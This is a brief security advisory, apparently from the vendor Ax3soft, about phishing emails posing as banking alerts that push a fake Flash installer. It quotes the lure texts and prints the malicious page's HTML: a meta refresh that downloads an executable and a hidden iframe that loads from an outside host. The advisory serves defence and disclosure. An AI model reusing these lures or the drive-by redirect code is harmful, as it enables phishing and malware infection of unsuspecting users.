Adobe Flash malware in what appears as phishing emails

 

 Bookmark and Share

Several emails were captured by Ax3soft, these emails seem to be  real phishing emails, but in fact they are trying to install malware on a computer using the form of an important Flash Player update from Adobe when we investigate the included URLs further.

  • Online Banking Account Alert

The first example is from the fake email address “Electronic Payments Association <buttesob62@rowan-glen.com>” attached the subject “Online Banking Account Alert!” and the main content of the email as followings:

You must submit verification documents to continue using your account without interruption. To view the details of this request and submit the required information, click on the following link (or copy & paste it into your web browser):

hxxp://astroereyna.gr/

We thank you for your assistance in this matter.

While browsing the web site with Firefox we got the message “Sorry, you need to install flash player to see this content…” and the download manager opened this message and downloaded the file adobe_flash_install.exe. The web site page’s code as followings:

Sorry, you need to install flash player to see this content...

 

<meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/

adobe_flash_install.exe" />

<iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1'

 height='1' style='visibility: hidden;'></iframe>

As a matter of fact, we got an HTML frameset to access the web site on Safari. It seems that some JavaScript redirection is active.

  • An unauthorized transaction billed from your bank account

The second example is from the fake address “Electronic Payments Association <euphemismm215@reagirona.com>”,with the subject “An unauthorized transaction billed from your bank account” and the main content as followings:

Dear bank account holder,

The ACH transaction, recently initiated from your bank account, was rejected by the Electronic Payments Association. Please review the transaction report by clicking the link below:

Unauthorized ACH Transaction Report

——————————————————————

Copyright ©2010 by NACHA – The Electronic Payments Association

A link to a fast flux domain is contained in the text “Unauthorized ACH Transaction Report”. When we follow the link, it leads us to get the following screen in the browser, and a download of the file adobe_flash_install.exe was one part of it.

 

We have added some new policies of Ax3soft Sax2 to detect the Trojan, please update the policy basic knowledge of Sax2 in time.

For more information, please visit  http://www.ids-sax2.com/ComputerSecurityNewsletter.htm